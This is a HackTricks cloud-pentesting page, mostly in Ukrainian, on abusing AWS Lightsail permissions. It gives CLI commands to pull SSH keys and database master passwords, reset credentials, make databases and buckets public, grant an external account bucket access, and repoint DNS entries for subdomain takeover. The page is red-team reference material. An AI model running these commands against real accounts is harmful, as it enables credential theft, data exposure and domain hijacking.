AWS - Lightsail Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lightsail

Для отримання додаткової інформації про Lightsail перегляньте:

AWS - Lightsail Enum

Важливо зазначити, що Lightsail не використовує IAM ролі, що належать користувачу, а належать керованому обліковому запису AWS, тому ви не можете зловживати цією службою для підвищення привілеїв. Однак, чутливі дані, такі як код, API ключі та інформація про базу даних, можуть бути знайдені в цій службі.

`lightsail:DownloadDefaultKeyPair`

Цей дозвіл дозволить вам отримати SSH ключі для доступу до інстансів:

aws lightsail download-default-key-pair

Потенційний вплив: Знайти чутливу інформацію всередині інстансів.

`lightsail:GetInstanceAccessDetails`

Ця дозволена дія дозволить вам генерувати SSH-ключі для доступу до інстансів:

aws lightsail get-instance-access-details --instance-name <instance_name>

Потенційний вплив: Знайти чутливу інформацію всередині екземплярів.

`lightsail:CreateBucketAccessKey`

Ця дозволена дія дозволить вам отримати ключ для доступу до кошика:

aws lightsail create-bucket-access-key --bucket-name <name>

Потенційний вплив: Знайти чутливу інформацію всередині бакету.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Ця дозволена дія дозволить вам отримати облікові дані для доступу до бази даних:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Потенційний вплив: Знайти чутливу інформацію в базі даних.

`lightsail:UpdateRelationalDatabase`

Ця дозволена дія дозволить вам змінити пароль для доступу до бази даних:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Якщо база даних не є публічною, ви також можете зробити її публічною з цими дозволами за допомогою

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Потенційний вплив: Знайти чутливу інформацію в базі даних.

`lightsail:OpenInstancePublicPorts`

Ця дозволяє відкривати порти для Інтернету.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Потенційний вплив: Доступ до чутливих портів.

`lightsail:PutInstancePublicPorts`

Ця дозволяє відкривати порти для Інтернету. Зверніть увагу, що виклик закриє будь-який порт, який не вказано в ньому.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Потенційний вплив: Доступ до чутливих портів.

`lightsail:SetResourceAccessForBucket`

Ця дозволяє надати екземплярам доступ до кошика без додаткових облікових даних

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Потенційний вплив: Потенційний новий доступ до бакетів з чутливою інформацією.

`lightsail:UpdateBucket`

З цією дозволом зловмисник може надати своєму обліковому запису AWS доступ на читання до бакетів або навіть зробити бакети публічними для всіх:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Потенційний вплив: Потенційний новий доступ до бакетів з чутливою інформацією.

`lightsail:UpdateContainerService`

З цими правами зловмисник може надати доступ до приватних ECR з сервісу контейнерів.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Потенційний вплив: Отримати чутливу інформацію з приватного ECR

`lightsail:CreateDomainEntry`

Зловмисник з цим дозволом може створити піддомен і вказати його на свою власну IP-адресу (взяття піддомену під контроль), або створити SPF запис, який дозволяє йому підробляти електронні листи з домену, або навіть встановити основний домен на свою власну IP-адресу.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Потенційний вплив: Захоплення домену

`lightsail:UpdateDomainEntry`

Зловмисник з цим дозволом може створити піддомен і вказати його на свою власну IP-адресу (захоплення піддомену), або створити SPF запис, який дозволяє йому підробляти електронні листи з домену, або навіть встановити основний домен на свою власну IP-адресу.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Потенційний вплив: Захоплення домену

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 3 days ago